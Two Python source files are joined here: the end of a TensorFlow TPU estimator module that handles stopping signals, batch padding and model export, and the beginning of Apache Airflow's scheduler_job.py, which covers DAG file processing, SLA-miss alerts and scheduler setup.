final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = array_ops.ones_like(signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
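# For example (illustrative values): with batch_size=2, stop=True, and no
# padding mask, as_dict() returns {'stopping': <bool Tensor of shape [2, 1]
# filled with True>}.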
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For the non-Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
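# For example (illustrative values): real_batch_size=3, missing_count=1, and
# batch_size=4 produce the mask [0, 0, 0, 1], where zeros mark real examples
# and ones mark padding.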
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path,
strip_default_attrs)
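# Illustrative usage (a hedged sketch; `my_estimator`, `my_serving_input_fn`,
# and the export path are hypothetical, not part of this module):
#
#   export_dir = export_estimator_savedmodel(
#       my_estimator, '/tmp/tpu_export',
#       serving_input_receiver_fn=my_serving_input_fn)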
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_, tuple_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from sqlalchemy.sql import expression
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, SerializedDagNotFound, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.event_scheduler import EventScheduler
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.retries import MAX_DB_RETRIES, retry_db_transaction, run_with_db_retries
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given file.
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance.
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: None (the result tuple is sent back to the parent over ``result_channel``)
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
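# Sentinel of the child process: it becomes ready when the process exits, so callers
# (e.g. the processor manager) can wait on many processors at once.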
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save them to the DB (or update the existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into the ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Find all tasks that have SLAs defined and send alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
max_tis: List[TI] = (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
)
.all()
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if task.sla and not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
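# Starting from the schedule after this TI's execution date, walk forward one schedule at a
# time; record an SlaMiss for every run whose following schedule plus the task's SLA has
# already passed.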
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(
SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
)
dttm = dag.following_schedule(dttm)
session.commit()
# pylint: disable=singleton-comparison
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
# pylint: enable=singleton-comparison
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether an email or any other alert notification was sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}</code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param session: DB session.
"""
for request in callback_requests:
self.log.debug("Processing Callback Request: %s", request)
try:
if isinstance(request, TaskCallbackRequest):
self._execute_task_callbacks(dagbag, request)
elif isinstance(request, SlaCallbackRequest):
self.manage_slas(dagbag.dags.get(request.dag_id))
elif isinstance(request, DagCallbackRequest):
self._execute_dag_callbacks(dagbag, request, session)
except Exception: # pylint: disable=broad-except
self.log.exception(
"Error executing %s callback for file: %s",
request.__class__.__name__,
request.full_filepath,
)
session.commit()
@provide_session
def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
dag = dagbag.dags[request.dag_id]
dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
dag.handle_callback(
dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
)
def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
if request.is_failure_callback:
ti.handle_failure_with_callback(error=request.msg, test_mode=ti.test_mode)
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
@provide_session
def process_file(
self,
file_path: str,
callback_requests: List[CallbackRequest],
pickle_dags: bool = False,
session: Session = None,
) -> Tuple[int, int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to this method.
3. Serialize the DAGs and save them to the DB (or update the existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into the ORM
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param callback_requests: failure callbacks to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: number of dags found, count of import errors
:rtype: Tuple[int, int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return 0, 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return 0, len(dagbag.import_errors)
self.execute_callbacks(dagbag, callback_requests)
# Save individual DAGs in the ORM
dagbag.sync_to_db()
if pickle_dags:
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
for dag in unpaused_dags:
dag.pickle(session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
:param log: override the default Logger
:type log: logging.Logger
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: logging.Logger = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(dag_folder=self.subdir, read_dags_from_db=True, load_op_links=False)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
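# SIGUSR2 handler: log a dump of the executor's internal state for debugging.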
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
